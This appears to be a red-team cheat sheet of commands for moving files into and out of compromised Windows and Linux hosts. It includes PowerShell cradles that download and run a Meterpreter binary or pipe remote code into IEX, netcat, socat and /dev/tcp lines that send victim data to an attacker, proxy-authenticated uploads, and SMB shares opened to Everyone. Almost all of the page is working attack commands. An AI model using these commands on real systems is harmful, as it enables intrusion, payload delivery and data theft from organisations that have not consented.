File Transfer


String to base64 and POST with PowerShell:

PS > $str = cmd /c net user /domain
PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS > IWR -Uri -Method POST -Body $base64str

File to base64 with certutil:

Cmd > certutil -encode <FILE_TO_ENCODE> C:\Windows\Temp\encoded.b64
Cmd > type C:\Windows\Temp\encoded.b64

Base64 file transfer from Linux to Windows:

$ base64 -w0 tunnel.aspx; echo
PS > Add-Content -Encoding UTF8 tunnel.b64 "<BASE64_CONTENTS>" -NoNewLine
PS > $data = Get-Content -Raw tunnel.b64
PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data))


Compress a binary file and transfer it to Windows by copy-pasting commands into the console:

$ upx -9 file.exe
$ exe2hex -x file.exe -p file.cmd
$ cat file.cmd | xclip -i -sel c


PowerShell upload file:

PS > (New-Object Net.WebClient).UploadFile("", "file.txt")

PowerShell auto detect proxy, download file from remote HTTP server and run it:

$proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe")

PowerShell manually set proxy and upload file to remote HTTP server:

$client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("","results.txt")

Another proxy-aware download cradle:

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr")
$wc = New-Object System.Net.WebClient
$wc.DownloadString("") | IEX
Remove-PSDrive -Name HKU -Force


Attacker is the sender:

# Sender:
root@kali:~$ tar -zcvf folder.tar.gz folder
root@kali:~$ nc -w3 -lvnp 1234 < folder.tar.gz
# Recipient:
www-data@victim:~$ bash -c 'cat < /dev/tcp/ > .folder.tar.gz'
www-data@victim:~$ tar -zxvf .folder.tar.gz

Victim is the sender:

# Recipient:
root@kali:~$ nc -w3 -lvnp 1234 > file.txt
# Sender:
www-data@victim:~$ bash -c 'cat < file.txt > /dev/tcp/'


Recipient (Attacker):

$ socat TCP-LISTEN:1337 OPEN:data.tar,create,append

Sender (Victim):

$ tar cf - /dev/shm/data | socat TCP: -


Start SMB server:

$ -smb2support share `pwd`

Mount SMB in Windows with net use:

$ -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
Cmd > net use Z: \\\share
Cmd > net use Z: \\\share /u:snovvcrash 'Passw0rd!'

Mount SMB in Windows with New-PSDrive:

$ -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass)
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
PS > New-PSDrive -Name Z -Root \\\share -Credential $cred -PSProvider FileSystem
PS > cd Z:

net share

Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL"
Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL"
Cmd > net share pentest /delete


$ python -m pip install pyftpdlib
$ python -m pyftpdlib -Dwp 2121
Cmd > cd C:\Windows\System32\spool\drivers\color
Cmd > echo 'open 2121' > ftp.txt
Cmd > echo 'user anonymous' >> ftp.txt
Cmd > echo 'anonymous' >> ftp.txt
Cmd > echo 'binary' >> ftp.txt
Cmd > echo 'put file.bin' >> ftp.txt
Cmd > echo 'bye' >> ftp.txt
Cmd > ftp -v -n -s:ftp.txt


Send file.exe from Windows to Linux (TFTP client must be enabled on Windows):

$ sudo atftpd --daemon --bind --port 69 ./tftp
Cmd > tftp -i put file.exe
$ sudo pkill atftpd

Exfiltration / Infiltration



$ sudo apt install npm -y
$ sudo npm install http-server -g
$ sudo http-server -d false -p 443 -S -C /etc/letsencrypt/live/ -K /etc/letsencrypt/live/ --log-ip | tee http-server.log


$ eget -qs linux/amd64 "patrickhener/goshs" --to ~/tools/goshs
$ sudo ~/tools/goshs/goshs -ro -si -p 443 -s -sc /etc/letsencrypt/live/ -sk /etc/letsencrypt/live/ -V | tee goshs.log


$ eget -qs linux/amd64 "projectdiscovery/simplehttpserver" --to ~/tools/pd
$ sudo ~/tools/pd/simplehttpserver -listen -path `pwd` -upload -https -cert /etc/letsencrypt/live/ -key /etc/letsencrypt/live/ -domain -basic-auth 'snovvcrash:Passw0rd!' -max-file-size 100

Last updated